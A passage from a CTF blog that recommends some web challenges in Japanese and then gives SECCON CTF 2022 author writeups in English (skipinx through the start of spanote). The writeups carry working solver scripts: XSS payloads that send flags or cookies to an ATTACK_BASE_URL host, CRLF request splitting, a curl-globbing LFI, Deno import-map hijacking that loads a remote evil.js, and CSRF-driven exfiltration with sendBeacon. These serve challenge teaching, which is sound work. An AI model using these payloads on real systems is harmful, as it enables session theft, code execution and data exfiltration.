> fs.readFileSync({href: "x", origin: "x", protocol: "file:", hostname: "", pathname: "%66lag.txt"}).toString()
'corctf{test_flag}'

「こんなことができたの!?という驚き」や「ソースコードの調査をしながらオブジェクトをパズル的に構成する楽しさ」がこのシンプルな問題の中に濃縮されていて、この問題を解くのは非常に良い体験でした。

詳しい解法は作問者writeupがあるのでそちらを参照してください:

【教育部門】 Cliche - ångstromCTF 2022

  • 難易度目安: ★☆☆

こちらは高校生向けのCTFであるångstromCTF2で出題された問題です。

問題ファイルはこちらにあります:

botがフラグのクッキーをもっているので、うまくXSSを発動させる問題です。本質的な箇所は以下の<script>部分です。

<script>
    const qs = new URLSearchParams(location.search);
    if (qs.get("content")?.length > 0) {
        document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
    }
</script>

クエリパラメータcontentに対して、DOMPurify.sanitizeでサニタイズしたあとにmarked.parseでMarkdownのパースを行い、そのパース結果を画面上に表示する処理になっています。

通常、DOMPurifyのようなサニタイザは文字列を加工する過程の最後で行うことが鉄則ですが、この問題ではそうはなっていません。つまり、「XSSに対して安全な文字列だが、Markdownパーサを通すことによってXSSが発火するようになる文字列」の入力を特定する必要があります。

この手の問題は、主に3つ(あるいはその組み合わせ)のアプローチがあるかなと思います:

  • ①コード解析
    • パーサのロジックを理解する
    • 利用できそうな処理や怪しい処理を見つける
    • Prototype Pollution系はだいたいこれ
  • ②手作業で試行錯誤
    • 手作業で試行錯誤しながらパーサが壊れそうな入力をぶつける
    • 攻撃者の"勘"が物を言う
  • ③fuzzerで殴る
    • fuzzerを実装してぶん回す
    • 出題例: Marked - Hayyim CTF 2022

markedは一般的に使われているライブラリなので、まずはMarkdownの表記周りで色々悪さできないか試すと良さそうです(つまり②)。

例えば、「`」で囲むとインラインコード扱いになるMakrdownの仕様を利用して以下のHTMLでXSSが可能です:

`<p id="`<img src=x onerror=console.log(1)>">

これにmarked.parseを通すと

<p><code>&lt;p id=&quot;</code><img src=x onerror=console.log(1)>&quot;&gt;</p></p>

となり、id属性の文字列だったXSSペイロードが外側に放り出されて<img>タグとして露出します。

marked.parse(DOMPurify.sanitize('<p id="x\n\n<img src=x onerror=console.log(1)>"></p>'))
'<p id="x\n\n<p><img src=x onerror=console.log(1)>&quot;&gt;</p></p>\n'

他にも以下のような解法がありました:

marked.parse(DOMPurify.sanitize('`<p id="`<img src=x onerror=console.log(1)>">'))
marked.parse(DOMPurify.sanitize('[<p id="<img src=x onerror=console.log(1)>](x"></p>)'))
marked.parse(DOMPurify.sanitize('[x](y "<style>")<!--</style><div id="x--><img src=1 onerror=console.log(1)>"></div>'))

marked.parse(DOMPurify.sanitize('<p id="x\n\n<img src=x onerror=console.log(1)>"></p>'))

marked.parse(DOMPurify.sanitize('<div id="1\n\n![](contenteditable/autofocus/onfocus=console.log(1)//)">'))

パーサ周りは色々おもしろい話があり、そのおもしろさの一端を味わえる教育的な問題として気に入っています。解法も色々あり、アイデアソンみたいな楽しさもある良問でした。

【the攻撃部門】 spoink - UIUCTF 2022

  • 難易度目安: ★★☆

この問題については以前に解法や感想をwriteupで書きました。攻撃のステップ数が多く複雑ですが、各要素はそれほど難しくはないのでよかったらぜひ読んでください:

ひとつの小さい脆弱性からRCEという致命的な脆弱性までもっていくリアルワールド3的な攻撃を楽しめる問題という点で気に入っています。

【天才解法部門】 modernblog - corCTF 2022

  • 難易度目安: ★★★

最後に紹介する問題はcorCTFで出題されたmodernblogで、React製4のクライアントサイド問です。めちゃくちゃ難しいのですが解法が天才的で気に入っています。ちなみに私はコンテスト中に解けませんでした。

解説をしようと思ったのですが、問題概要も含めて公式writeupがかなりわかりやすくて5蛇足にしかなりえなかったので、そちらを参照してください。

読んでいくとおそらく何度も頭の中が「?」になりますが、すべてを理解した瞬間にすべてが結びつき「最高」になれます。この感動を一人でも味わってほしいです。

その他の良問

紹介しきれなかったですが次の問題もおもしろい問題で印象的でした。問題名と関連リンクだけ貼っておきます:

他にも楽しい問題や新しい発見をくれた問題などたくさんありました。 各CTFの運営・作問者のみなさまありがとうございました!来年もよろしくお願いします。

明日のアドベントカレンダー

明日のAdCはkash1064さんの記事です!内容は...まだ不明?

Footnotes

  1. 「おもしろかったxxx問の紹介」系の記事を誰かが書くと、他の人が同じジャンルで似た記事を書きにくくなるのでは?と若干危惧しています。いろいろな人のその人視点の「おもしろかった問題」を知りたいので、ツイートでもいいのでどんどん書いてほしいです!

  2. 高校生向けとはありますが特に制限はないので誰でも参加できます。問題の質が良く教育的な問題も多いので個人的におすすめの初心者向けCTFです。

  3. 「リアルワールド」の解釈は状況によって異なりますが、少なくともここではスクリプトキディやOSINT的な要素は指してません。

  4. 最近はReactやVue.jsのようなフロントエンドのフレームワークに絡んだ問題が少しずつ増えてきている印象です。時代の流れを感じます。

  5. 作問者のStrellicさんは作問のクオリティが高いだけでなくwriteupでの解説も丁寧なので、問題を解かずに読むだけでも楽しいと思います。理想的なので自分もこうなれるように精進したいです。

]]> CTF Advent Calendar <![CDATA[SECCON CTF 2022 Quals: Author writeups - English]]> https://blog.arkark.dev/2022/11/18/seccon-en https://blog.arkark.dev/2022/11/18/seccon-en Fri, 18 Nov 2022 00:00:00 GMT Thank you for playing SECCON CTF 2022 Quals! Just like last year, I wrote some challenges for this CTF.

My challenge list:

ChallengeCategoryDifficultyKeywordsSolved
skipinxwebwamupquery parser, DoS102
easylfiwebeasycurl, URL globbing, LFI62
bffcalcwebmediumCRLF injection, request splitting41
piyosaywebmediumTrusted Types, DOMPurify, RegExp19
denoboxwebmedium-hardprototype pollution, import maps1
spanotewebhardChrome, disk cache, bfcache1
latexipymisceasypyjail, magic comment8
txtcheckermiscmediummagic file, ReDoS23
noisecconmiscmedium-hard1Perlin noise22

I added the source code and author's solvers to my-ctf-challenges repository.

[web] skipinx

Description:

ALL YOU HAVE TO DO IS SKIP NGINX

  • http://skipinx.seccon.games:8080

Overview

This is a simple server-side challenge.

The sever returns a response of Access here directly, not via nginx :( for your request:

nginx/default.conf
server {
  listen 8080 default_server;
  server_name nginx;

  location / {
    set $args "${args}&proxy=nginx";
    proxy_pass http://web:3000;
  }
}

The nginx adds a query parameter proxy=nginx to each request, and proxies the request to the backend server.

web/index.js
const app = require("express")();

const FLAG = process.env.FLAG ?? "SECCON{dummy}";
const PORT = 3000;

app.get("/", (req, res) => {
  req.query.proxy.includes("nginx")
    ? res.status(400).send("Access here directly, not via nginx :(")
    : res.send(`Congratz! You got a flag: ${FLAG}`);
});

app.listen({ port: PORT, host: "0.0.0.0" }, () => {
  console.log(`Server listening at ${PORT}`);
});

The backend server returns a flag only if a request doesn't have proxy=nginx.

Can you access the backend server without going through nginx?

Solution

Express uses qs as a default query parser:

Also, Express uses default values for options on qs:

Option parameterLimit specifies the maximum number of query parameters and the default value is 1000.

The parameter is used in:

// from: https://github.com/ljharb/qs/blob/v6.11.0/lib/parse.js#L54-L55
var limit = options.parameterLimit === Infinity ? undefined : options.parameterLimit;
var parts = cleanStr.split(options.delimiter, limit);

As you can see, Express ignores parameters after a parameterLimit-th parameter. Thus, if you send a request with more than 1000 query parameters, proxy=nginx is ignored.

Solver

import os
import httpx

BASE_URL = "http://skipinx.seccon.games:8080"

# ref. https://github.com/ljharb/qs/blob/v6.11.0/lib/parse.js#L21
PARAMETER_LIMIT = 1000

query = "proxy=something" + ("&"*(PARAMETER_LIMIT - 1))
res = httpx.get(f"{BASE_URL}/?{query}")
print(res.text)

Flag

SECCON{sometimes_deFault_options_are_useful_to_bypa55}

[web] easylfi

Description:

Can you read my secret?

  • http://easylfi.seccon.games:3000

Overview

This is server-side challenge.

You access the server:

If you submit test, the server redirects to /hello.html?%7Bname%7D=test:

Source code (web/app.py):

from flask import Flask, request, Response
import subprocess
import os

app = Flask(__name__)


def validate(key: str) -> bool:
    # E.g. key == "{name}" -> True
    #      key == "name"   -> False
    if len(key) == 0:
        return False
    is_valid = True
    for i, c in enumerate(key):
        if i == 0:
            is_valid &= c == "{"
        elif i == len(key) - 1:
            is_valid &= c == "}"
        else:
            is_valid &= c != "{" and c != "}"
    return is_valid


def template(text: str, params: dict[str, str]) -> str:
    # A very simple template engine
    for key, value in params.items():
        if not validate(key):
            return f"Invalid key: {key}"
        text = text.replace(key, value)
    return text


@app.after_request
def waf(response: Response):
    if b"SECCON" in b"".join(response.response):
        return Response("Try harder")
    return response


@app.route("/")
@app.route("/<path:filename>")
def index(filename: str = "index.html"):
    if ".." in filename or "%" in filename:
        return "Do not try path traversal :("

    try:
        proc = subprocess.run(
            ["curl", f"file://{os.getcwd()}/public/{filename}"],
            capture_output=True,
            timeout=1,
        )
    except subprocess.TimeoutExpired:
        return "Timeout"

    if proc.returncode != 0:
        return "Something wrong..."
    return template(proc.stdout.decode(), request.args)

The goal is stealing a flag from /flag.txt.

Solution

Step 1: path traversal

The server uses curl to read files:

        proc = subprocess.run(
            ["curl", f"file://{os.getcwd()}/public/{filename}"],
            capture_output=True,
            timeout=1,
        )

Unfortunately, path traversal to /flag.txt is prevented:

    if ".." in filename or "%" in filename:
        return "Do not try path traversal :("

By the way, curl has a feature of URL globbing, and you can access multiple resources at the same time. You can bypass the above defense using this feature:

$ http "http://localhost:3000/.{.}/.{.}/flag.txt"
HTTP/1.1 200 OK
Connection: close
Content-Length: 10
Content-Type: text/html; charset=utf-8
Date: Sat, 05 Nov 2022 12:09:18 GMT
Server: Werkzeug/2.2.2 Python/3.10.8

Try harder

However, the following WAF hides the flag response:

@app.after_request
def waf(response: Response):
    if b"SECCON" in b"".join(response.response):
        return Response("Try harder")
    return response

Step 2: bypassing WAF

The server returns a response after the following process:

    return template(proc.stdout.decode(), request.args)

The implementation of the template engine is as follows:

def validate(key: str) -> bool:
    # E.g. key == "{name}" -> True
    #      key == "name"   -> False
    if len(key) == 0:
        return False
    is_valid = True
    for i, c in enumerate(key):
        if i == 0:
            is_valid &= c == "{"
        elif i == len(key) - 1:
            is_valid &= c == "}"
        else:
            is_valid &= c != "{" and c != "}"
    return is_valid


def template(text: str, params: dict[str, str]) -> str:
    # A very simple template engine
    for key, value in params.items():
        if not validate(key):
            return f"Invalid key: {key}"
        text = text.replace(key, value)
    return text

Is it possible to show the flag string without SECCON by abusing this template engine?

The first important point is that validate("{") is True. You can bypass it with this bug and URL globbing.

Example payload:

  • URL: file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • params: 
    {
        "{name}": "{",
        "{": "}{",
        "{!</h1>\n</body>\n</html>\n--_curl_--file:///app/public/../../flag.txt\nSECCON}": ""
    }

The process in the template engine is as follows.

The initial state:

... snip ...
<body>
  <h1>Hello, {name}!</h1>
</body>
</html>
--_curl_--file:///app/public/../../flag.txt
SECCON{real_flag}

"{name}""{":

... snip ...
<body>
  <h1>Hello, {!</h1>
</body>
</html>
--_curl_--file:///app/public/../../flag.txt
SECCON{real_flag}

"{""}{":

... snip ...
<body>
  <h1>Hello, }{!</h1>
</body>
</html>
--_curl_--file:///app/public/../../flag.txt
SECCON}{real_flag}

"{!</h1>\n</body>\n</html>\n--_curl_--file:///app/public/../../flag.txt\nSECCON}""":

... snip ...
<body>
  <h1>Hello, }{real_flag}

Solver

import os
import httpx

BASE_URL = f"http://easylfi.seccon.games:3000"

res = httpx.get(
    BASE_URL + "/{.}./{.}./{app/public/hello.html,flag.txt}",
    params={
        "{name}": "{",
        "{": "}{",
        "{!</h1>\n</body>\n</html>\n--_curl_--file:///app/public/../../flag.txt\nSECCON}": "",
    },
)

print("SECCON" + res.text.split("<h1>Hello, }")[1])

Flag

SECCON{i_lik3_fe4ture_of_copy_aS_cur1_in_br0wser}

[web] bffcalc

Description:

There is a simple calculator!

  • http://bffcalc.seccon.games:3000

Overview

This web service is a simple calculator:

docker-copmose.yml
version: "3"

services:
  nginx:
    build: ./nginx
    restart: always
    ports:
      - "3000:3000"
  bff:
    build: ./bff
    restart: always
  backend:
    build: ./backend
    restart: always
  report:
    build: ./report
    restart: always
  bot:
    build: ./bot
    restart: always
    environment:
      - FLAG=SECCON{dummydummy}
  • nginx: It proxies requests to bff and report
  • bff: It serves static files and proxies requests to backend.
  • backend: It evaluate a simple expression and returns the result.

The server uses cherrypy as a framework. A bot sets a flag as a cookie value with a HttpOnly attribute.

Solution

Step 1: XSS

Firstly, there is a trivial XSS vulnerability in index.html: 、index.html

        const result = await (await fetch("/api?expr=" + encodeURIComponent(expr))).text();
        document.getElementById("result").innerHTML = result || " ";

However, you cannot read the flag cookie since it has a HttpOnly attribute.

Step 2: CRLF injection

bff's proxy process to backend is as follows:

def proxy(req) -> str:
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("backend", 3000))
    sock.settimeout(1)

    payload = ""
    method = req.method
    path = req.path_info
    if req.query_string:
        path += "?" + req.query_string
    payload += f"{method} {path} HTTP/1.1\r\n"
    for k, v in req.headers.items():
        payload += f"{k}: {v}\r\n"
    payload += "\r\n"

    sock.send(payload.encode())
    time.sleep(.3)
    try:
        data = sock.recv(4096)
        body = data.split(b"\r\n\r\n", 1)[1].decode()
    except (IndexError, TimeoutError) as e:
        print(e)
        body = str(e)
    return body

bff constructs HTTP requests and sends them using socket.

Herein, the process for headers in cherrypy is as follows:

cherrypy decodes headers following RFC 2047. So, you can attack with CRLF injection by sending decoded \r\n on headers.

Is it possible to construct a request whose response includes the flag cookie with CRLF injection?

backend uses waitress as a WSGI to cherrypy. The following implementation is important to solve this challenge:

If the first line of a HTTP request is invalid, waitress returns the invalid HTTP method in the body. By abusing this behavior, you can steal the flag from the response body.

There are three points to steal the flag:

  • HTTP request splitting with CRLF injection
  • Adjusting a Content-Length value of the first splitted request so that the cookie value is at the position of the HTTP method of the second splitted request
  • Adding another cookie so that the second request matches with the following regex: 
    # From: https://github.com/Pylons/waitress/blob/v2.1.2/src/waitress/parser.py#L409-L413
    first_line_re = re.compile(
        b"([^ ]+) "
        b"((?:[^ :?#]+://[^ ?#/]*(?:[0-9]{1,5})?)?[^ ]+)"
        b"(( HTTP/([0-9.]+))$|$)"
    )
    • E.g. document.cookie = '/?a=b HTTP/1.1'
    • Then, the first line is flag=SECCON{real_flag}; /?a=b HTTP/1.1 and it matches with the regex.

Solver

const fastify = require("fastify")();

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");

const LISTEN_PORT = process.env.PORT ?? "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const encode = (bs) => {
    // ref. https://www.rfc-editor.org/rfc/rfc2047.html#section-2
    charset = "iso-8859-1";
    encoding = "q";
    encoded_text = Array.from(Buffer.from(bs))
      .map((x) => "=" + Buffer.from([x]).toString("hex"))
      .join("");
    return `=?${charset}?${encoding}?${encoded_text}?=`;
  };

  const contentLength =
    "Accept: */*\r\nReferer: http://nginx:3000/\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: "
      .length;
  const evilHeader = encode(`bbb\r\nContent-Length: ${contentLength}\r\n`);

  const evilJs = `
    const main = async () => {
      document.cookie = '/?a=b HTTP/1.1';

      const res = await fetch('/api?expr=1', {
        method: 'GET',
        headers: {
          'aaa': '${evilHeader}',
        },
      });
      location = '${ATTACK_BASE_URL}/?text=' + encodeURIComponent(await res.text());
    };
    main();
  `.replaceAll("\n", "");
  if (evilJs.includes('"')) {
    fail("Invalid evilJs");
  }

  const xssPayload = `<img src=0 onerror="${evilJs}">`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        expr: xssPayload,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const text = req.query.text;
    console.log(text); // Print a flag

    process.exit(0);
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(1000);
      await exploit();

      await sleep(5000);
      console.log("Failed");
      process.exit(1);
    }
  );
};
start();

Flag

SECCON{i5_1t_p0ssible_tO_s7eal_http_only_cooki3_fr0m_XSS}

[web] piyosay

Description:

I know the combination of DOMPurify and Trusted Types is a perfect defense for XSS attacks.

  • http://piyosay.seccon.games:3000

Overview

  • This is a client-side challenge.
  • CSP: trusted-types default dompurify; require-trusted-types-for 'script'
  • A bot's has a flag as a cookie value.

The essential code in this challenge is only the following part of web/result.html:

<!DOCTYPE html>
<html>
<head>
  <!-- snip -->
</head>
<body style="padding: 3rem;">
  <!-- snip  -->

  <script>
    trustedTypes.createPolicy("default", {
      createHTML: (unsafe) => {
        return DOMPurify.sanitize(unsafe)
          .replace(/SECCON{.+}/g, () => {
            // Delete a secret in RegExp
            "".match(/^$/);
            return "SECCON{REDACTED}";
          });
      },
    });
  </script>
  <script>
    const get = (path) => {
      return path.split("/").reduce((obj, key) => obj[key], document.all);
    };

    const init = async () => {
      /* snip */
    };

    const main = async () => {
      const params = new URLSearchParams(location.search);

      const message = `${params.get("message")}${
        document.cookie.split("FLAG=")[1] ?? "SECCON{dummy}"
      }`;
      // Delete a secret in document.cookie
      document.cookie = "FLAG=; expires=Thu, 01 Jan 1970 00:00:00 GMT";
      get("message").innerHTML = message;

      const emoji = get(params.get("emoji"));
      get("message").innerHTML = get("message").innerHTML.replace(/{{emoji}}/g, emoji);
    };

    document.addEventListener("DOMContentLoaded", async () => {
      await init();
      await main();
    });
  </script>
</body>
</html>

Solution

Step 1: XSS with bypassing Trusted Types

The settings of Trusted Types is as follows:

    trustedTypes.createPolicy("default", {
      createHTML: (unsafe) => {
        return DOMPurify.sanitize(unsafe)
          .replace(/SECCON{.+}/g, () => {
            // Delete a secret in RegExp
            "".match(/^$/);
            return "SECCON{REDACTED}";
          });
      },
    });

For example, you can bypass it to XSS with the following payload:

> createHTML('SECCON{x<p id="}<img src=0 onerror=console.log(1)>"></p>')
'SECCON{REDACTED}<img src=0 onerror=console.log(1)>"></p>'

However, you cannot steal a flag from document.cookie because the flag is deleted in:

document.cookie = "FLAG=; expires=Thu, 01 Jan 1970 00:00:00 GMT";

Step 2: RegExp in DOMPurify

By the way, what is the following line in createHTML?

// Delete a secret in RegExp
"".match(/^$/);

JavaScript has interesting(?) behavior in RegExp:

"".match(/^$/) is a process to delete values of the above static properties. If this line does not exist, you can steal the flag from RegExp.input with:

document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["input"]

By the way, DOMPurify uses regular expressions when it sanitizes strings:

> DOMPurify.sanitize('x<script><SECCON{xxx}')
'x'
> RegExp.input
'<SECCON{xxx}'
> RegExp.rightContext
'ECCON{xxx}'
> document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
'ECCON{xxx}'

This fact is useful to solve this challenge.

Step 3: just a XSS puzzle game!

You are ready to steal the flag.

Example URL:

  const emoji = "0/ownerDocument/defaultView/RegExp/rightContext";
  const message = `{{emoji}} S{{emoji}}<p id="}<img src=0 onerror=fetch(\`${ATTACK_BASE_URL}/?text=\`+encodeURIComponent(document.all.message.textContent))>"></p><script><`;
  const url = `http://web:3000/result?${new URLSearchParams({
    emoji,
    message,
  })}`;

If you report this URL, the server of ATTACK_BASE_URL will receive ECCON{real_flag} SECCON{REDACTED}">.

Solver

const fastify = require("fastify")();

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL ?? fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL ?? fail("No ATTACK_BASE_URL");

const LISTEN_PORT = process.env.PORT ?? "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const exploit = async () => {
  const emoji = "0/ownerDocument/defaultView/RegExp/rightContext";
  const message = `{{emoji}} S{{emoji}}<p id="}<img src=0 onerror=fetch(\`${ATTACK_BASE_URL}/?text=\`+encodeURIComponent(document.all.message.textContent))>"></p><script><`;
  const url = `http://web:3000/result?${new URLSearchParams({
    emoji,
    message,
  })}`;

  const res = await (
    await fetch(`${SECCON_BASE_URL}/report`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        url,
      }),
    })
  ).text();
  console.log(res); // "Received :)"
};

const start = async () => {
  fastify.get("/", async (req, reply) => {
    const text = req.query.text;

    // Print a flag
    console.log("S" + text);
    // -> SECCON{real_flag} SECCON{REDACTED}">

    process.exit(0);
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) {
        fastify.log.error(err);
        process.exit(1);
      }

      await sleep(1000);
      await exploit();

      await sleep(5000);
      console.log("Failed");
      process.exit(1);
    }
  );
};
start();

Flag

SECCON{w0w_yoU_div3d_deeeeeep_iNto_DOMPurify}

[web] denobox

Description:

Your program runs in a sandbox!

  • http://denobox.seccon.games:3000

Overview

This is a Deno sandbox challenge.

  • The server-side language is Rust.
  • The server creates a TypeScript program and executes it using deno run as a subprocess.

You can generate a TypeScript program with user-defined parts under the constraints of a validator:

You can execute your program with specified JSON as input data:

You can get the JSON result of the execution:

The {{FLAG}} in source code is replaced with a flag string:

if ("{{FLAG}}" in output) {
  delete output["{{FLAG}}"];
}

The goal is to steal the flag string in this if statement.

Solution

Step 1: prototype pollution

The validator limits user-defined parts by traversing AST of TypeScript. Example limitation:

fn validate_identifier(ident: &Ident) -> Result<(), String> {
    // Limit available variables to `input` and `output` only.
    if ident.sym.eq("input") || ident.sym.eq("output") {
        Ok(())
    } else {
        Err(format!("{:?}", ident))
    }
}
fn validate_assign_expr(expr: &AssignExpr) -> Result<(), String> {
    (match expr.left.as_pat() {
        Some(Pat::Expr(expr)) => validate_expr(expr),
        _ => Err(format!("{:?}", expr.left)),
    })?;
    validate_expr(&expr.right)?;
    Ok(())
}

There is a trivial Prototype Pollution vulnerability. Also, unlike usual Prototype Pollution, you can pollute something by methods of some built-in Objects (E.g., Object, String, and Array).

By Prototype Pollution, can you do something in the following parts:

if ("{{FLAG}}" in output) {
  delete output["{{FLAG}}"];
}

const filename = crypto.randomUUID().replaceAll("-", "") + ".json";
await Deno.writeTextFile(filename, JSON.stringify(output));
console.log(filename);

Interestingly, by the following pollution, you can specify an arbitrary string for crypto.randomUUID().replaceAll("-", ""):

"".constructor.prototype.replaceAll = "".constructor.raw;
"".constructor.prototype.raw = input.filename;

So, you can specify the name of the output JSON file with a suffix .json.

Step 2: import maps in Deno

From v1.18, Deno has a feature of auto-discovery of the config file:

In this challenge settings, if there is deno.json in the current directory, the deno command reads it as a config file. This is possible using the Prototype Pollution described in Step 1.

You will notice a interesting property importMap if you check the schema of the configuration:

// From: https://deno.land/x/deno@v1.27.1/cli/schemas/config-file.v1.json
/* snip */
    "importMap": {
      "description": "The location of an import map to be used when resolving modules. If an import map is explicitly specified, it will override this value.",
      "type": "string"
    },
/* snip */

Import maps:

Using this property, you can assign https://deno.land/std@0.161.0/crypto/mod.ts into an arbitrary file. Of course, it includes your JavaScript file served on your server!

Thus, you can do RCE! However, note that there is a permission --allow-write=. and you cannot read the source code.

Step 3: JavaScript Proxy

The goal is to hook any process in the following:

if ("{{FLAG}}" in output) {
  delete output["{{FLAG}}"];
}

It is possible using JavaScript Proxy:

Solver

evil.js
export const crypto = {
  randomUUID: () => ({
    replaceAll: () => "dummy",
  }),
};

const proxy1 = new Proxy(
  {},
  {
    has(target, propertyKey) {
      console.log(propertyKey); // output a flag
      return Reflect.has(...arguments);
    },
  }
);

const proxy2 = new Proxy(
  {},
  {
    set(target, property, value, receiver) {
      Object.setPrototypeOf(value, proxy1);
      return Reflect.set(...arguments);
    },
  }
);

JSON.parse = () => proxy2;
index.js
const fastify = require("fastify")();
const fs = require("node:fs");

const fail = (message) => {
  console.error(message);
  return process.exit(1);
};

const SECCON_BASE_URL = process.env.SECCON_BASE_URL || fail("No SECCON_BASE_URL");
const ATTACK_BASE_URL = process.env.ATTACK_BASE_URL || fail("No ATTACK_BASE_URL");

const LISTEN_PORT = process.env.PORT || "8080";

const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

const source = `
  output.importMap = input.importMap;
  output.imports = input.imports;
  "".constructor.prototype.replaceAll = "".constructor.raw;
  "".constructor.prototype.raw = input.filename;

  input.key = output;
`;

const importMapJson = JSON.stringify({
  filename: "import_map",
  imports: {
    "https://deno.land/std@0.161.0/crypto/mod.ts": `${ATTACK_BASE_URL}/evil.js`,
  },
});

const denoJson = JSON.stringify({
  filename: "deno",
  importMap: "import_map.json",
});

const exploit = async () => {
  const path = await (
    await fetch(`${SECCON_BASE_URL}/`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        source,
      }),
    })
  ).text();

  await fetch(`${SECCON_BASE_URL}${path}/run`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      input: importMapJson,
    }),
  });

  await fetch(`${SECCON_BASE_URL}${path}/run`, {
    method: "POST",
    headers: {
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      input: denoJson,
    }),
  });

  const flag = await (
    await fetch(`${SECCON_BASE_URL}${path}/run`, {
      method: "POST",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify({
        input: "",
      }),
    })
  ).text();

  console.log(flag);
};

const start = async () => {
  const evilJs = fs.readFileSync("evil.js").toString();
  fastify.get("/evil.js", async (req, reply) => {
    return evilJs;
  });

  fastify.listen(
    { port: LISTEN_PORT, host: "0.0.0.0" },
    async (err, address) => {
      if (err) fail(err);

      await sleep(1000);
      await exploit();
      fastify.close();
    }
  );
};
start();

Flag

SECCON{thE_denO_masc0t_dino5auR_staNding_in_tHe_s4ndbox}

ref. https://github.com/denoland/deno/blob/v1.27.1/README.md?plain=1#L6

[web] spanote

Description:

Single Page Application makes our note app simple.

  • http://spanote.seccon.games:3000

Overview

There is a simple note application.

Create a note:

Delete a note:

  • The bot accesses a reported URL after creating a note with a flag string.
  • There is no CSP, but it is seemingly impossible to do XSS🤔

Solution

Step 1: Understanding cache behavior in Google Chrome

Let me get straight to the point, in my solution, you can XSS by abusing cache behavior in Google Chrome. To solve this challenge, you need to have some knowledge of cache behavior (or experiment it).

There are two impotant types of cache:

As a interesting point of disk cache, the cache includes not only the HTTP response rendered to a web page, but also those fetched with fetch. In other words, if you access the URL for a fetched resource, the browser will render the resource on the page.

There is another important point. If both disk cache and bfcache are valid for an accessed page at back/forward navigations, the bfcache has priority over the disk cache. So, it is necessary to have a situation where bfcache is disabled to trigger the above behavior of disk cache.

Step 2: Rendering a fetch response with disk cache

Let's try the interesting behavior in this challenge.

Firstly, you have to disable bfcache2. There are many conditions where bfcache is disabled, the list is:

The easy way is to use RelatedActiveContentsExist.

Therefore, the following procedure reproduces the behavior:

  1. Access a web page (E.g. https://example.com)
  2. Execute open("http://spanote.seccon.games:3000/api/token")
    • The server returns a response with 500 status code.
  3. In the opend tab, access http://spanote.seccon.games:3000/
    • Then, the response of http://spanote.seccon.games:3000/api/token is cached as a disk cache.
  4. Execute history.back()
    • The cached JSON response is rendered on the page!

You can confirm that disk cache is used using DevTools in Google Chrome:

Step 3: HTML rendering with handling Content-Type

This web service returns responses only with application/json or application/octet-stream. So you cannot do XSS by rendering them.

Herein, note that notes are served with @fastify/static:

  sendNote(reply, noteId) {
    return reply.sendFile(`db/${this.id}/${noteId}`);
  }

The implementation is as follows:

The Content-Type is defined according to the extension of a served file. The extension for text/html is .html.

By the way, there is a trivial CSRF vulnerability for two APIs to create/delete a note. So you can call them freely.

The API to delete a note is as follows:

/* snip */

const validate = (id) => {
  if (typeof id !== "string") {
    throw Error(`Invalid id: ${id}`);
  }
  if (
    id.includes("..") ||
    id.includes("/") ||
    id.includes("\\") ||
    id.includes("%")
  ) {
    // No path traversal
    throw Error(`Invalid id: ${id}`);
  }
  return id;
};

/* snip */

class User {
  /* snip */

  async deleteNote(noteId) {
    await fs.writeFile(`db/${this.id}/${noteId}`, `deleted: ${noteId}`);
    return noteId;
  }

  /* snip */
}

/* snip */

fastify.post("/api/notes/delete", async (request, reply) => {
  const user = new User(request.session.userId);
  const noteId = validate(request.body.noteId);
  await user.deleteNote(noteId);
  return { noteId };
});

/* snip */

If you call the API with noteId=<img src=0 onerror="alert(1)">.html, Content-Type of the response for

GET /api/notes/<img src=0 onerror="alert(1)">.html

is text/html:

If you render it by the above technique, a XSS occurs:

Step 4: Code golf

Note that if the XSS payload is too long, you cannot use it as a part of URL and the XSS fails. Implementation of fastify:

The limitation is 100 characters, so you have to play code golf.

Example payload:

<img src=0 onerror="window.addEventListener('message',e=>eval(e.data))">.html

Solver

public/index.html
<body>
  <script>
    const sleep = (msec) => new Promise((resolve) => setTimeout(resolve, msec));

    const deleteNote = (url, noteId) => {
      const form = document.createElement("form");
      form.action = url;
      form.method = "post";
      form.target = "_blank";

      const input = document.createElement("input");
      input.name = "noteId";
      input.value = noteId;
      form.appendChild(input);

      document.body.appendChild(form);
      form.submit();
    };

    const evilJs = `
      (async () => {
        const { token } = await (await fetch("/api/token")).json();

        const noteIds = await (
          await fetch("/api/notes", {
            headers: { "X-Token": token },
          })
        ).json();

        const notes = await Promise.all(
          noteIds.map((id) =>
            fetch("/api/notes/" + id, {
              headers: { "X-Token": token },
            }).then((res) => res.text())
          )
        );

        navigator.sendBeacon("${location.origin}", notes.join("\\n"));
      })();
    `;

    const main = async () => {
      const params = new URLSearchParams(location.search);
      const baseUrl = params.get("baseUrl");
      const noteId = params.get("noteId");

      {
        // Delete a note (and create a deleted page) with CSRF
